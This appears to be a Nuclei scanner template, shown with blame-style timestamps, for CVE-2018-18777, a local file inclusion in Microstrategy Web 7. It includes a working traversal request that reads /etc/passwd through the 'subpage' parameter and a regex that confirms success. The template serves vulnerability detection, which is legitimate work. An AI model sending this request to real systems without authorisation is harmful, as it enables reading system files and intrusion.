2021-06-20 10:26:27 +00:00
id : CVE-2018-18777
info :
2022-07-26 13:45:11 +00:00
name : Microstrategy Web 7 - Local File Inclusion
2021-06-20 10:26:27 +00:00
author : 0x_Akoko
2021-09-10 11:26:40 +00:00
severity : medium
2021-08-29 06:42:18 +00:00
description : |
2022-07-26 13:45:11 +00:00
Microstrategy Web 7 is vulnerable to local file inclusion via "/WebMstr7/servlet/mstrWeb" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/45755
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-18777
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 4.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-18777
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : traversal,edb,packetstorm,cve,cve2018,microstrategy,lfi
2021-06-20 10:26:27 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-06-20 10:26:27 +00:00
- type : status
status :
- 200
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/22